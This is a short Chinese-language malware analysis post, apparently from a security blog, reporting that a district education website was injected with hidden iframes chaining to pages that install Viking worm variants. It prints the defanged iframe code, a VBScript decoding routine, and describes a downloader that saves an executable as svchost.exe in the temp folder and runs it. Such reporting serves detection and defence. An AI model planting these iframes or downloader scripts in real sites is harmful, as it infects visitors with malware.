某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码

简介: 某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码

该网首页末被加入代码:

/---
<iframe src="hxxp://w**.q**b*b****d.com/b**d*.htm?001" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width="0" height="0" frameborder="0"></iframe><iframe src=%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width=0 height=0></iframe>
---/

hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码:

/---
<iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码:

/---
<iframe src="hxxp://w**.q**b*b****d.com/0.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://w**.q**b*b****d.com/0.htm (瑞星网页监控报为:Trojan.DL.VBS.Agent.clo)包含VBScript脚本代码,功能是用自定义函数:

function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function

解密变量t的值并执行。

变量t解密后的值为VBScript脚本代码,功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe,并创建内容为

/---
Set Shell = Shell.Application
Shell.ShellExecute %temp%/svchost.exe "","","","open",0
---/

的文件svchost.vbs,通过Shell.Application 对象 的 ShellExecute 方法 来运行svchost.vbs,从而让%temp%/svchost.exe得已运行。


相关文章
|
2月前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
2月前
|
Web App开发 安全
某县农业信息网挂马 Worm.Win32.AutoRun.umf
某县农业信息网挂马 Worm.Win32.AutoRun.umf
|
2月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
QQ信息中传播Worm.Viking.es的这个网页真复杂
QQ信息中传播Worm.Viking.es的这个网页真复杂
|
2月前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样
传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样
传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样
某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码